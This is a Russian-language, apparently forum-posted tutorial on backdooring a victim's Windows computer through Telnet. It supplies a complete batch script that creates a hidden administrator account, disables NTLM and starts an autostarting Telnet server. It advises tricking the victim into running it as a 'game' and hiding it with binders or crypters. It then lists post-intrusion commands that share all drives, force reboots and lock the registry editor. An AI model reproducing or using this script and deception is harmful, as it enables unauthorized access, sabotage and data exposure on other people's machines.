Начнём с самого актуального на сегодняшний момент метода, это «Телнет»
Телнет - сетевой протокол для работы в удаленной системе в терминальном режиме

При подключении по телнету всё делается в режиме консоли или командной стоки виндовс. (Пуск >Выполнить>cmd>)
Единственный минус этого метода в том что нужно открыть службу на компе жертвы. Конешно бывает такое что ничего открывать не нужно и на компе уже всё установлено но скорее всего при коннекте будет выставлено требование ввести пароль. Подбирать пароль (Брутить) почти бесполезно. Так что придётся пообщаться с юзверем о пароле) СИ иными словами.

Для того что бы коннектица к компу по телнету нужно написать специальный батник (.bat) и попросить жертву запустить файл. Например – «О_о глыбай какая игруха!!1 Запускай ща по гамаем по сетевухе!!111 Инэт не забудь включить!» Или как нибудь еще))
Вот собственно сам батник…

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
Пишем в нотепад (блокнот) и сохраняем в формате .bat

Ну вот так вот…настройки и конфигурация сервиса завершена, а эта строчка net start Telnet
окончательно запустит наш бэкдор.
Открываем командную строку, если

Если что то она прописана по адресу c:WINDOWSsystem32cmd.exe. Вставляем код,
запускаем и смотрим нет ли ошибок. Убедится что все нормально, еще можно как нить так :
Пуск -> Выполнить -> пишем services.msc -> Ok

Там ты видишь запуск, остановку и настройку служб Windows. Выбираешь Telnet, и
смотришь её свойства. При необходимости в любой момент можно её отключить.
Вот и всё впринципе уже 80% пути пройдено.

Если юзер умный(ая) то лучше конечно воспользоваться джойнером.
Еще можно криптор заюзать) тоже вариант.

Ну вот. Дальше останется только сконектица по телнету. Поехали…
Для этого можешь выбрать стандартный виндосовский

Сам клиент который находится здесь c:WINDOWSsystem32telnet.exe.
Запускаем. И сточим вот такие стоки:
Microsoft Telnet> o 192.168.1.24 [IP юзера] 972[порт]

если пишет:
Welcome to Microsoft Telnet Service
login:_
то всё ок) Поздравляю ты стал взломщиком)))
Вводишь:

login: inattack ( это пример, можно и свой лог)

password: attack +))
Появляется надпись:

*================================================================
Вас приветствует Telnet-сервер производства корпорации Майкрософт
*================================================================
C:>_

Поздравляю, ты внутри, перед тобой консоль, с помощью которой ты можешь
управлять компом, отдавая команды...
Можно к примеру расшарить диски:

C:>net share disk_c=c: > nul
C:>net share disk_d=d: > nul
C:>net share disk_e=e: > nul

перезагрузить комп:
C:>shutdown -r -t 1 -c -f

прописать какой-нибудь ключ реестра:
C:>reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v
DisableRegistryTools /t REG_DWORD /d 1 /f - который запретит доступ к нему
Ну еще много чего) Включаем моск))
Всё. Если узнаю и попробую что нибудь новое то обязательно выложу.

Статья написана для ознакомления бла бла итд итп…=)))

Всё проверено лично мною и моим другом))